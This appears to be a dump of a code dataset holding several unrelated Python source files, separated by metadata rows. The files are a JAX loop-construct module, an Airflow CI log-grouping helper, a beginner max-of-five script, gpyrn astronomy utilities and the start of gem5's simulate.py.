          "Pred must be a scalar, got {} of shape {}.".format(pred, np.shape(pred)))

    try:
      pred_dtype = np.result_type(pred)
    except TypeError as err:
      msg = ("Pred type must be either boolean or number, got {}.")
      raise TypeError(msg.format(pred)) from err

    if pred_dtype.kind != 'b':
      if pred_dtype.kind in 'iuf':
        # Coerce numeric predicates to booleans.
        pred = pred != 0
      else:
        msg = ("Pred type must be either boolean or number, got {}.")
        raise TypeError(msg.format(pred_dtype))

    return _BodyTracer(self, _CondBuilder(pred))

  def while_range(self, cond_func):
    """Creates an iterator that continues as long as `cond_func` returns true.

    The body is converted to a `lax.while_loop`.
    The `grad` transformation does not work.

    Usage::

      for _ in scope.while_range(lambda: s.loss > 1.e-5):
        s.loss = loss(...)

    Args:
      cond_func: a lambda with no arguments, the condition for the "while".
    """
    return _BodyTracer(self, _WhileBuilder(cond_func))

  def _push_range(self, range_):
    # Guard against nesting a range iterator inside itself.
    for ar in self._active_ranges:
      if ar is range_:
        raise ValueError("Range is reused nested inside itself.")
    self._active_ranges.append(range_)

  def _pop_range(self, range_):
    # Ranges must exit in LIFO order; anything else means a premature exit.
    if not (range_ is self._active_ranges[-1]):
      self._error_premature_exit_range()
    self._active_ranges.pop()

  def _error_premature_exit_range(self):
    """Raises error about premature exit from a range"""
    msg = "Some ranges have exited prematurely. The innermost such range is at\n{}"
    raise ValueError(msg.format(self._active_ranges[-1].location()))

  def __getattr__(self, key):
    """Accessor for scope data.

    Called only if the attribute is not found, which will happen when we read
    scope data that has been stored in self._mutable_state.
    """
    mt_val = self._mutable_state.get(key)
    if mt_val is None:
      raise AttributeError(
          "Reading uninitialized data '{}' from the scope.".format(key))
    return mt_val

  def __setattr__(self, key, value):
    """Update scope data to be functionalized.

    Called for *all* attribute setting.
    """
    # The bookkeeping attributes themselves bypass the mutable-state checks.
    if key in ["_active_ranges", "_mutable_state", "_mutable_state_aval", "_count_subtraces"]:
      object.__setattr__(self, key, value)
    else:
      if self._active_ranges:
        if key not in self._mutable_state:
          raise ValueError(
              "New mutable state '{}' cannot be created inside a loop.".format(key))
        assert key in self._mutable_state_aval
        old_aval = self._mutable_state_aval[key]
        flat_values, flat_tree = tree_util.tree_flatten(value)
        new_aval = flat_tree.unflatten(safe_map(_BodyTracer.abstractify, flat_values))
        # Inside a loop the abstract value (shape/dtype/pytree) must not change.
        if old_aval != new_aval:
          msg = (f"Mutable state '{key}' is updated with new abstract value "
                 f"{new_aval}, which is different from previous one {old_aval}")
          raise TypeError(msg)
      self._mutable_state[key] = value

  def __enter__(self):
    return self

  def __exit__(self, exc_type, exc_val, exc_tb):
    try:
      if exc_type is None:
        if self._active_ranges:  # We have some ranges that we did not exit properly
          self._error_premature_exit_range()
        return True
      else:
        # The exception may come from inside one or more ranges. We let the current
        # exception propagate, assuming it terminates the tracing. If not, the
        # tracers may be left in an inconsistent state.
        return False  # re-raise
    finally:
      # Ensure we leave the global trace_state as we found it
      while self._count_subtraces > 0:
        self.end_subtrace()

  def start_subtrace(self):
    """Starts a nested trace, returns the Trace object."""
    # TODO: This follows the __enter__ part of core.new_main.
    level = core.thread_local_state.trace_state.trace_stack.next_level()
    main = core.MainTrace(level, pe.JaxprTrace)
    core.thread_local_state.trace_state.trace_stack.push(main)
    self._count_subtraces += 1
    return pe.JaxprTrace(main, core.cur_sublevel())

  def end_subtrace(self):
    # TODO: This follows the __exit__ part of core.new_main
    core.thread_local_state.trace_state.trace_stack.pop()
    self._count_subtraces -= 1
class _BodyTracer(object):
  """Traces the body of the loop and builds a functional control-flow representation.

  This class is also an iterator, only the first iteration is traced.
  """

  def __init__(self, scope, loop_builder):
    """
    Params:
      scope: the current scope
      loop_builder: instance of _LoopBuilder
    """
    self.scope = scope
    self.loop_builder = loop_builder
    self.first_iteration = True  # If we are tracing the first iteration
    # Stack trace, without this line and the s.range function
    self.stack = traceback.StackSummary.from_list(
        cast(List[Any], traceback.extract_stack()[:-2]))

    # Next are state kept from the start of the first iteration to the end of the iteration.
    # List of scope fields carried through the loop; None until tracing starts.
    self.carried_state_names: List[str] = None
    self.carried_state_initial = {}  # Copy of the initial values of state, before loop starts
    # The parameters that were created for state upon entering an arbitrary iteration.
    self.carried_state_vars = {}  # For each state, the list of Tracer variables introduced
    # when starting to trace the loop body.

    self.trace = None

  def location(self):
    """A multiline string representing the source location of the range."""
    if self.stack is not None:
      return "   ".join(self.stack.format())
    else:
      return ""

  def __iter__(self):
    """Called before starting the first iteration."""
    self.first_iteration = True  # In case we reuse the range
    return self

  def __next__(self):
    if self.first_iteration:
      # Enter the range and start tracing; hand the index tracer to the body.
      self.first_iteration = False
      self.scope._push_range(self)
      self.start_tracing_body()
      return self._index_var
    else:
      # Second call: finalize the traced body and stop iterating.
      self.end_tracing_body()
      self.scope._pop_range(self)
      raise StopIteration  # Trace only one iteration.

  def next(self):  # For PY2
    return self.__next__()

  def start_tracing_body(self):
    """Called upon starting the tracing of the loop body."""
    # TODO: This is the first part of partial_eval.trace_to_subjaxpr. Share.
    self.trace = self.scope.start_subtrace()
    # The entire state is carried.
    self.carried_state_names = sorted(self.scope._mutable_state.keys())
    for key in self.carried_state_names:
      init_val = self.scope._mutable_state[key]
      flat_init_vals, init_tree = tree_util.tree_flatten(init_val)
      flat_init_avals = safe_map(_BodyTracer.abstractify, flat_init_vals)
      flat_init_pvals = safe_map(pe.PartialVal.unknown, flat_init_avals)
      flat_init_vars = safe_map(self.trace.new_arg, flat_init_pvals)
      self.carried_state_vars[key] = flat_init_vars
      # Set the scope._mutable_state to new tracing variables.
      self.scope._mutable_state[key] = init_tree.unflatten(flat_init_vars)
      self.scope._mutable_state_aval[key] = init_tree.unflatten(flat_init_avals)
      # Make a copy of the initial state by unflattening the flat_init_vals
      self.carried_state_initial[key] = init_tree.unflatten(flat_init_vals)

    # The index variable is an extra abstract argument to the body.
    index_var_aval = _BodyTracer.abstractify(0)
    index_var_pval = pe.PartialVal.unknown(index_var_aval)
    self._index_var = self.trace.new_arg(index_var_pval)

  def end_tracing_body(self):
    """Called when we are done tracing one iteration of the body."""
    # We will turn the body of the loop into a function that takes some values
    # for the scope state (carried_state_names) and returns the values for the
    # same state fields after one execution of the body. For some of the ranges,
    # e.g., scope.range, the function will also take the index_var as last parameter.
    in_tracers = tuple(itertools.chain(*[self.carried_state_vars[ms] for ms in self.carried_state_names]))
    if self.loop_builder.can_use_index_var():
      in_tracers += (self._index_var,)
    # Make the jaxpr for the body of the loop
    # TODO: See which mutable state was changed in the one iteration.
    # For now, we assume all state changes.
    body_out_tracers = []
    for key in self.carried_state_names:
      new_val = self.scope._mutable_state[key]
      flat_new_values, flat_new_tree = tree_util.tree_flatten(new_val)
      body_out_tracers.extend(flat_new_values)
      assert key in self.scope._mutable_state_aval
      old_aval = self.scope._mutable_state_aval[key]
      new_aval = flat_new_tree.unflatten(safe_map(_BodyTracer.abstractify, flat_new_values))
      if old_aval != new_aval:
        msg = (f"Mutable state '{key}' had at the end of the loop body new abstract value "
               f"{new_aval}, which is different from initial one {old_aval}")
        raise TypeError(msg)

    try:
      # If the body actually uses the index variable, and is not allowed to
      # (e.g., cond_range and while_range), then in_tracers will not contain
      # the tracer for the index_var, and trace_to_jaxpr_finalize will throw
      # an assertion error.
      body_closed_jaxpr, body_const_vals = _BodyTracer.trace_to_jaxpr_finalize(
          in_tracers=in_tracers,
          out_tracers=body_out_tracers,
          trace=self.trace)
    except UnexpectedTracerError as e:
      if "Tracer not among input tracers" in str(e):
        raise ValueError("Body of cond_range or while_range should not use the "
                         "index variable returned by iterator.") from e
      raise
    # End the subtrace for the loop body, before we trace the condition
    self.scope.end_subtrace()

    carried_init_val = tuple([self.carried_state_initial[ms]
                              for ms in self.carried_state_names])
    carried_init_vals, carried_tree = tree_util.tree_flatten(carried_init_val)
    assert len(carried_init_vals) == len(body_out_tracers)

    # Delegate to the loop builder to emit the actual lax primitive.
    carried_out_vals = self.loop_builder.build_output_vals(
        self.scope, self.carried_state_names, carried_tree,
        carried_init_vals, body_closed_jaxpr, body_const_vals)
    carried_mutable_state_unflattened = tree_util.tree_unflatten(carried_tree,
                                                                 carried_out_vals)

    # Update the mutable state with the values of the changed vars, after the loop.
    for ms, mv in zip(self.carried_state_names, carried_mutable_state_unflattened):
      self.scope._mutable_state[ms] = mv

  @staticmethod
  def abstractify(x):
    return core.raise_to_shaped(core.get_aval(x), weak_type=False)

  @staticmethod
  def trace_to_jaxpr_finalize(in_tracers, out_tracers, trace, instantiate=True):
    # TODO: This is the final part of the partial_eval.trace_to_subjaxpr. Share.
    instantiate = [instantiate] * len(out_tracers)
    out_tracers = safe_map(trace.full_raise, safe_map(core.full_lower, out_tracers))
    out_tracers = safe_map(partial(pe.instantiate_const_at, trace),
                           instantiate, out_tracers)
    jaxpr, consts, env = pe.tracers_to_jaxpr(in_tracers, out_tracers)
    assert not env  # TODO: this is from partial_eval.trace_to_jaxpr. Share.
    closed_jaxpr = core.ClosedJaxpr(pe.convert_constvars_jaxpr(jaxpr), ())
    return closed_jaxpr, consts
class _LoopBuilder(object):
"""Abstract superclass for the loop builders"""
def can_use_index_var(self):
"""Whether this kind of loop can use the index var returned by the range iterator."""
raise NotImplementedError
def build_output_vals(self, scope, carried_state_names, carried_tree,
init_vals, body_closed_jaxpr, body_const_vals):
"""Builds the output values for the loop carried state.
Params:
scope: the current Scope object.
carried_state_names: the list of names of mutable state fields that is
carried through the body.
carried_tree: the PyTreeDef for the tuple of carried_state_names.
init_vals: the initial values on body entry corresponding to the init_tree.
body_closed_jaxpr: the Jaxpr for the body returning the new values of
carried_state_names.
body_const_vals: the constant values for the body.
Returns:
the output tracer corresponding to the lax primitive representing the loop.
"""
raise NotImplementedError
def __str__(self):
raise NotImplementedError
class _BoundedLoopBuilder(_LoopBuilder):
  """Builds a lax.scan primitive for a bounded `range`-style iteration."""

  def __init__(self, start, stop, step):
    self.start = start
    self.stop = stop
    self.step = step
    self._index_var = None  # Placeholder for the index-variable parameter.

  def can_use_index_var(self):
    # A bounded range knows its index values, so the body may read them.
    return True

  def build_output_vals(self, scope, carried_state_names, carried_tree,
                        init_vals, body_closed_jaxpr, body_const_vals):
    index_values = jnp.arange(self.start, stop=self.stop, step=self.step)
    num_consts = len(body_const_vals)
    num_carry = len(init_vals)
    # Scan over the precomputed index values; the body consumes the index
    # as the scanned input (hence the +1 in `linear`).
    return lax_control_flow.scan_p.bind(
        *body_const_vals, *init_vals, index_values,
        reverse=False,
        length=index_values.shape[0],
        jaxpr=body_closed_jaxpr,
        num_consts=num_consts,
        num_carry=num_carry,
        linear=(False,) * (num_consts + num_carry + 1),
        unroll=1)
class _CondBuilder(_LoopBuilder):
  """Builds a lax.cond operation."""

  def __init__(self, pred):
    # cond_p dispatches on an integer branch index; the boolean predicate is
    # converted so it selects branch 0 (pass-through) or 1 (the traced body).
    self.index = lax.convert_element_type(pred, np.int32)

  def can_use_index_var(self):
    # A conditional has no iteration index.
    return False

  def build_output_vals(self, scope, carried_state_names, carried_tree,
                        init_vals, body_closed_jaxpr, body_const_vals):
    """Binds cond_p with a synthesized pass-through branch.

    The false branch simply returns the carried state unchanged, so the
    traced body only takes effect when the predicate is true.
    """
    # Simulate a pass-through false branch
    in_vals, in_tree = tree_util.tree_flatten(
        (body_const_vals, tree_util.tree_unflatten(carried_tree, init_vals)))
    in_avals = safe_map(_BodyTracer.abstractify, in_vals)
    # lambda *args: args[1] returns the (unflattened) carried state,
    # ignoring the body constants in args[0].
    pass_through_closed_jaxpr, pass_through_const_vals, _ = (
        lax_control_flow._initial_style_jaxpr(
            lambda *args: args[1],
            in_tree,
            tuple(in_avals)))
    assert len(pass_through_const_vals) == 0
    args = [*body_const_vals, *init_vals]
    return lax_control_flow.cond_p.bind(
        self.index, *args,
        branches=(pass_through_closed_jaxpr, body_closed_jaxpr),
        linear=(False,) * len(args))
class _WhileBuilder(_LoopBuilder):
  """Builds a lax.while operation."""

  def __init__(self, cond_func):
    # The condition takes no arguments; it reads loop state via the scope.
    self.cond_func = cond_func  # Function with 0 arguments (can reference the scope)

  def can_use_index_var(self):
    # An open-ended while loop has no iteration index.
    return False

  def build_output_vals(self, scope, carried_state_names, carried_tree,
                        init_vals, body_closed_jaxpr, body_const_vals):
    """Binds while_p, tracing the 0-argument condition into a jaxpr over the
    carried state and checking it returns a boolean scalar without mutating
    the scope."""
    # Trace the conditional function. cond_func takes 0 arguments, but
    # for lax.while we need a conditional function that takes the
    # carried_state_names. _initial_style_jaxpr will start its own trace and
    # will create tracers for all the carried state. We must put these values
    # in the scope._mutable_state before we trace the conditional
    # function.
    def cond_func_wrapped(*args):
      assert len(args) == len(carried_state_names)
      for ms, init_ms in zip(carried_state_names, args):
        scope._mutable_state[ms] = init_ms
      res = self.cond_func()
      # Conditional function is not allowed to modify the scope state
      for ms, init_ms in zip(carried_state_names, args):
        if not (scope._mutable_state[ms] is init_ms):
          raise ValueError(f"Conditional function modifies scope.{ms} field.")
      return res

    init_avals = safe_map(_BodyTracer.abstractify, init_vals)
    cond_jaxpr, cond_consts, cond_tree = (
        lax_control_flow._initial_style_jaxpr(cond_func_wrapped,
                                              carried_tree,
                                              tuple(init_avals)))
    # TODO: share these checks with lax_control_flow.while
    if not tree_util.treedef_is_leaf(cond_tree):
      raise TypeError(f"cond_fun must return a boolean scalar, but got pytree {cond_tree}.")
    if not safe_map(core.typecompat, cond_jaxpr.out_avals, [core.ShapedArray((), np.bool_)]):
      raise TypeError(f"cond_fun must return a boolean scalar, but got output type(s) "
                      f"{cond_jaxpr.out_avals}.")

    return lax_control_flow.while_p.bind(*cond_consts, *body_const_vals, *init_vals,
                                         cond_nconsts=len(cond_consts),
                                         cond_jaxpr=cond_jaxpr,
                                         body_nconsts=len(body_const_vals),
                                         body_jaxpr=body_closed_jaxpr)
| 41.364566
| 106
| 0.687204
|
4a0508334b73c763011960a672e8eeff4c84dc8d
| 1,476
|
py
|
Python
|
dev/breeze/src/airflow_breeze/utils/ci_group.py
|
npodewitz/airflow
|
511ea702d5f732582d018dad79754b54d5e53f9d
|
[
"Apache-2.0"
] | null | null | null |
dev/breeze/src/airflow_breeze/utils/ci_group.py
|
npodewitz/airflow
|
511ea702d5f732582d018dad79754b54d5e53f9d
|
[
"Apache-2.0"
] | null | null | null |
dev/breeze/src/airflow_breeze/utils/ci_group.py
|
npodewitz/airflow
|
511ea702d5f732582d018dad79754b54d5e53f9d
|
[
"Apache-2.0"
] | null | null | null |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
from contextlib import contextmanager
@contextmanager
def ci_group(title, enabled: bool = False):
    """
    If used in GitHub Action, creates an expandable group in the GitHub Action log.
    Otherwise, display simple text groups.

    For more information, see:
    https://docs.github.com/en/free-pro-team@latest/actions/reference/workflow-commands-for-github-actions#grouping-log-lines
    """
    # Disabled groups are completely silent.
    if not enabled:
        yield
        return
    running_in_github = os.environ.get('GITHUB_ACTIONS', 'false') == "true"
    if not running_in_github:
        # Plain-text fallback when not running under GitHub Actions.
        marker = "#" * 20
        print(marker, title, marker)
        yield
        return
    # GitHub Actions workflow commands for a collapsible log group.
    print(f"::group::{title}")
    print()
    yield
    print("\033[0m")  # reset terminal colors before closing the group
    print("::endgroup::")
| 34.325581
| 125
| 0.70935
|
4a050890aa903cfa9fc5aa904925c2bdd3633ffd
| 540
|
py
|
Python
|
Estrutura de Repetição/7 Qual o maior elemento.py
|
knapoli/programas-python
|
51c3f8f84c3237866a20f37859ef0bcfe9850d15
|
[
"MIT"
] | null | null | null |
Estrutura de Repetição/7 Qual o maior elemento.py
|
knapoli/programas-python
|
51c3f8f84c3237866a20f37859ef0bcfe9850d15
|
[
"MIT"
] | null | null | null |
Estrutura de Repetição/7 Qual o maior elemento.py
|
knapoli/programas-python
|
51c3f8f84c3237866a20f37859ef0bcfe9850d15
|
[
"MIT"
] | null | null | null |
# Read five numbers and report the largest one.
num1 = float(input('Entre com o primeiro numero: '))
num2 = float(input('Entre com o segundo numero: '))
num3 = float(input('Entre com o terceiro numero: '))
num4 = float(input('Entre com o quarto numero: '))
num5 = float(input('Entre com o quinto numero: '))

lista = [num1, num2, num3, num4, num5]

# The builtin max() replaces the manual first-iteration/comparison loop,
# which re-implemented max() by hand with a `primeiraVez` flag.
maiorElemento = max(lista)

print('O maior elemento é: ',maiorElemento)
| 36
| 52
| 0.683333
|
4a0508d88289743f4e96fe965e29e4d80a0ebf8d
| 8,075
|
py
|
Python
|
gpyrn/_utils.py
|
j-faria/gpyrn
|
61a3cd0333d8f474521ec7a8298bc97153e5ad34
|
[
"MIT"
] | null | null | null |
gpyrn/_utils.py
|
j-faria/gpyrn
|
61a3cd0333d8f474521ec7a8298bc97153e5ad34
|
[
"MIT"
] | null | null | null |
gpyrn/_utils.py
|
j-faria/gpyrn
|
61a3cd0333d8f474521ec7a8298bc97153e5ad34
|
[
"MIT"
] | 1
|
2021-12-09T13:07:54.000Z
|
2021-12-09T13:07:54.000Z
|
"""
Collection of useful functions
"""
import matplotlib.pyplot as plt
import numpy as np
from scipy.stats import invgamma
from scipy.linalg import cho_solve, cho_factor
from scipy.optimize import minimize
from random import shuffle
##### Semi amplitude calculation ##############################################
def semi_amplitude(period, Mplanet, Mstar, ecc):
    """
    Calculates the semi-amplitude (K) caused by a planet with a given
    period and mass Mplanet, around a star of mass Mstar, with an
    eccentricity ecc.

    Parameters
    ----------
    period: float
        Period in years
    Mplanet: float
        Planet's mass in Jupiter masses, technically it is the M.sin i
    Mstar: float
        Star mass in Solar masses
    ecc: float
        Eccentricity, between 0 and 1

    Returns
    -------
    float
        Semi-amplitude K
    """
    # np.float was deprecated in NumPy 1.20 and removed in 1.24; the builtin
    # float gives identical results.
    per = float(np.power(1 / period, 1 / 3))
    Pmass = Mplanet / 1
    Smass = float(np.power(1 / Mstar, 2 / 3))
    Ecc = 1 / np.sqrt(1 - ecc**2)

    return 28.435 * per * Pmass * Smass * Ecc
##### Keplerian function ######################################################
def keplerian(P=365, K=.1, e=0, w=np.pi, T=0, phi=None, gamma=0, t=None):
    """
    keplerian() simulates the radial velocity signal of a planet in a
    keplerian orbit around a star.

    Parameters
    ----------
    P: float
        Period in days
    K: float
        RV amplitude
    e: float
        Eccentricity
    w: float
        Longitude of the periastron
    T: float
        Zero phase
    phi: float
        Orbital phase (overrides T when given)
    gamma: float
        Constant system RV
    t: array
        Time of measurements

    Returns
    -------
    t: array
        Time of measurements (unchanged)
    RV: list
        RV signal generated

    Raises
    ------
    ValueError
        If t is None (the original merely printed a message and then
        crashed with a TypeError further down).
    """
    if t is None:
        raise ValueError("keplerian() requires the time array 't'")
    times = np.asarray(t, dtype=float)

    # mean anomaly
    if phi is not None:
        T = times[0] - (P * phi) / (2. * np.pi)
    mean_anom = 2 * np.pi * (times - T) / P

    # Initial guess for the eccentric anomaly:
    # E0 = M + e*sin(M) + 0.5*(e**2)*sin(2*M)
    ecc_anom = mean_anom + e * np.sin(mean_anom) \
                         + 0.5 * (e**2) * np.sin(2 * mean_anom)

    # Newton iteration for Kepler's equation E - e*sin(E) = M, vectorized.
    # The original looped 1000 times over Python lists and, moreover,
    # computed the residual from the *previous* eccentric anomaly; here the
    # residual always uses the current iterate and we stop on convergence.
    for _ in range(1000):
        residual = mean_anom - (ecc_anom - e * np.sin(ecc_anom))
        if np.max(np.abs(residual)) < 1e-14:
            break
        ecc_anom = ecc_anom + residual / (1 - e * np.cos(ecc_anom))

    # true anomaly
    nu = 2 * np.arctan(np.sqrt((1 + e) / (1 - e)) * np.tan(ecc_anom / 2))
    # radial velocity, m/s; returned as a list to match the original output
    RV = (gamma + K * (e * np.cos(w) + np.cos(w + nu))).tolist()
    return t, RV
##### Phase-folding function ##################################################
def phase_folding(t, y, yerr, period):
    """
    phase_folding() allows the phase folding (duh...) of a given data
    accordingly to a given period

    Parameters
    ----------
    t: array
        Time
    y: array
        Measurements
    yerr: array or None
        Measurement errors; when None, zero errors are assumed
    period: float
        Period to fold the data

    Returns
    -------
    phase: tuple
        Phase
    folded_y: tuple
        Sorted measurements according to the phase
    folded_yerr: tuple
        Sorted errors according to the phase
    """
    t = np.asarray(t)
    y = np.asarray(y)
    # divide the time by the period and keep only the fractional part,
    # giving the phase in [0, 1)
    foldtimes = (t / period) % 1
    if yerr is None:
        # BUG FIX: the original used `0 * y`, which for a plain list gives
        # an *empty* list and silently truncated the zip below.
        yerr = np.zeros_like(y)
    else:
        yerr = np.asarray(yerr)
    # sort everything by phase
    phase, folded_y, folded_yerr = zip(*sorted(zip(foldtimes, y, yerr)))
    return phase, folded_y, folded_yerr
##### truncated cauchy distribution ###########################################
def truncCauchy_rvs(loc=0, scale=1, a=-1, b=1, size=None):
    """
    Generate random samples from a Cauchy distribution truncated to [a, b].

    Parameters
    ----------
    loc: int
        Location parameter of the distribution
    scale: int
        Scale parameter of the distribution
    a, b: int
        Interval [a, b] to which the distribution is limited
    size: int or tuple, optional
        Number/shape of samples to draw

    Returns
    -------
    rvs: float or ndarray
        Samples of the truncated Cauchy
    """
    # Inverse-CDF sampling: map the bounds through the Cauchy CDF, draw
    # uniformly between the two CDF values, then invert the CDF.
    cdf_lo = np.arctan((a - loc) / scale) / np.pi + 0.5
    cdf_hi = np.arctan((b - loc) / scale) / np.pi + 0.5
    uniform_draws = np.random.uniform(cdf_lo, cdf_hi, size=size)
    return loc + scale * np.tan(np.pi * (uniform_draws - 0.5))
##### inverse gamma distribution ###############################################
def f(x, lims):
    """Objective used by invGamma: squared deviation of the inverse-gamma
    tail probabilities at `lims` from the 1% target on each side.

    A named def instead of a lambda bound to a name (PEP 8, E731).

    Arguments
    ---------
    x : sequence of two floats
        Candidate (a, scale) parameters of the inverse gamma
    lims : sequence of two floats
        The (lower, upper) limits
    """
    dist = invgamma(a=x[0], scale=x[1])
    residuals = np.array([dist.cdf(lims[0]) - 0.01,
                          dist.sf(lims[1]) - 0.01])
    return (residuals**2).sum()


def invGamma(lower, upper, x0=[1, 5], showit=False):
    """
    Find an inverse-gamma distribution that places ~98% of its probability
    mass between `lower` and `upper` (1% in each tail).

    Arguments
    ---------
    lower, upper : float
        The upper and lower limits between which we want 98% of the probability
    x0 : list, length 2
        Initial guesses for the parameters of the inverse gamma (a and scale)
    showit : bool
        Make a plot

    Returns
    -------
    scipy.stats frozen distribution
        The fitted inverse-gamma distribution
    """
    limits = [lower, upper]
    result = minimize(f, x0=x0, args=limits, method='L-BFGS-B',
                      bounds=[(0, None), (0, None)], tol=1e-10)
    a, b = result.x
    if showit:
        _, ax = plt.subplots(1, 1, constrained_layout=True)
        d = invgamma(a=a, scale=b)
        x = np.linspace(0.2 * limits[0], 2 * limits[1], 1000)
        ax.plot(x, d.pdf(x))
        ax.vlines(limits, 0, d.pdf(x).max())
        plt.show()
    return invgamma(a=a, scale=b)
##### log sum ##################################################################
def log_sum(log_summands):
    """Log-sum-exp of `log_summands`, pivoting on the first element.

    If the pivot produces a non-finite result, the values are shuffled and
    the computation retried with a different pivot.
    """
    values = log_summands.copy()
    total = np.inf
    while not np.isfinite(total):
        total = values[0] + np.log(1 + np.sum(np.exp(values[1:] - values[0])))
        shuffle(values)
    return total
##### multivariate normal ######################################################
def multivariate_normal(r, c, method='cholesky'):
    """
    Computes the multivariate normal *log*-density for "residuals" vector r
    and covariance c.

    :param array r:
        1-D array of k dimensions.
    :param array c:
        2-D array or matrix of (k x k).
    :param string method:
        Method used to compute the density.
        Possible values are:
            * "cholesky": uses the Cholesky decomposition of the covariance c,
              via scipy.linalg.cho_factor and scipy.linalg.cho_solve.
            * "solve": uses the numpy.linalg functions solve() and slogdet().
        Any other value returns None (preserved from the original).
    :return: log-density at vector position r.
    """
    # Normalization term k*log(2*pi), shared by both methods.
    norm_term = len(r) * np.log(2 * np.pi)

    if method == 'cholesky':
        factor, lower = cho_factor(c)
        alpha = cho_solve((factor, lower), r)
        # log|c| from the Cholesky factor's diagonal.
        log_det = 2 * np.sum(np.log(np.diag(factor)))
        return -0.5 * (norm_term + np.dot(r, alpha) + log_det)

    if method == 'solve':
        (_, log_det) = np.linalg.slogdet(c)
        alpha = np.linalg.solve(c, r)
        return -0.5 * (norm_term + np.dot(r, alpha) + log_det)
##### RMS ######################################################################
def rms(array):
    """ Root mean square of the deviations of *array* from its mean.

    Parameters
    ----------
    array: array
        Measurements

    Returns
    -------
    float
        Root mean squared error
    """
    deviations = array - np.average(array)
    return np.sqrt(np.sum(deviations**2) / array.size)
def wrms(array, weights):
    """ Weighted root mean square of *array*, given *weights*.

    Parameters
    ----------
    array: array
        Measurements
    weights: array
        weights = 1 / errors**2
        To add jitter use 1 / (errors**2 + jitter**2)

    Returns
    -------
    float
        Weighted root mean squared error
    """
    weighted_mean = np.average(array, weights=weights)
    deviations = array - weighted_mean
    return np.sqrt(np.sum(weights * deviations**2) / np.sum(weights))
### END
| 28.942652
| 80
| 0.536099
|
4a0509504b111555acb6c2937e83b5382d083703
| 13,421
|
py
|
Python
|
src/python/m5/simulate.py
|
zinob15/gem5
|
fb2946e314ea9e63c7696ee8023150ed13956582
|
[
"BSD-3-Clause"
] | 1
|
2021-10-11T18:06:53.000Z
|
2021-10-11T18:06:53.000Z
|
src/python/m5/simulate.py
|
zinob15/gem5
|
fb2946e314ea9e63c7696ee8023150ed13956582
|
[
"BSD-3-Clause"
] | 1
|
2022-01-31T13:15:08.000Z
|
2022-01-31T13:15:08.000Z
|
src/python/m5/simulate.py
|
zinob15/gem5
|
fb2946e314ea9e63c7696ee8023150ed13956582
|
[
"BSD-3-Clause"
] | 1
|
2021-11-08T18:50:43.000Z
|
2021-11-08T18:50:43.000Z
|
# Copyright (c) 2012,2019 ARM Limited
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Copyright (c) 2005 The Regents of The University of Michigan
# Copyright (c) 2010 Advanced Micro Devices, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import atexit
import os
import sys
# import the wrapped C++ functions
import _m5.drain
import _m5.core
from _m5.stats import updateEvents as updateStatEvents
from . import stats
from . import SimObject
from . import ticks
from . import objects
from m5.util.dot_writer import do_dot, do_dvfs_dot
from m5.util.dot_writer_ruby import do_ruby_dot
from .util import fatal
from .util import attrdict
# define a MaxTick parameter, unsigned 64 bit
MaxTick = 2**64 - 1
_memory_modes = {
"atomic" : objects.params.atomic,
"timing" : objects.params.timing,
"atomic_noncaching" : objects.params.atomic_noncaching,
}
_drain_manager = _m5.drain.DrainManager.instance()
# The final hook to generate .ini files. Called from the user script
# once the config is built.
def instantiate(ckpt_dir=None):
    """Build the C++ SimObject hierarchy from the Python config and set up
    statistics.  Must be called once, after Root() is created and before
    simulate().

    Args:
        ckpt_dir: Optional checkpoint directory.  When given, state is
            restored from the checkpoint via loadState(); otherwise each
            object's initState() is called.
    """
    from m5 import options

    root = objects.Root.getInstance()

    if not root:
        fatal("Need to instantiate Root() before calling instantiate()")

    # we need to fix the global frequency
    ticks.fixGlobalFrequency()

    # Make sure SimObject-valued params are in the configuration
    # hierarchy so we catch them with future descendants() walks
    for obj in root.descendants(): obj.adoptOrphanParams()

    # Unproxy in sorted order for determinism
    for obj in root.descendants(): obj.unproxyParams()

    if options.dump_config:
        ini_file = open(os.path.join(options.outdir, options.dump_config), 'w')
        # Print ini sections in sorted order for easier diffing
        for obj in sorted(root.descendants(), key=lambda o: o.path()):
            obj.print_ini(ini_file)
        ini_file.close()

    if options.json_config:
        try:
            import json
            json_file = open(
                os.path.join(options.outdir, options.json_config), 'w')
            d = root.get_config_as_dict()
            json.dump(d, json_file, indent=4)
            json_file.close()
        except ImportError:
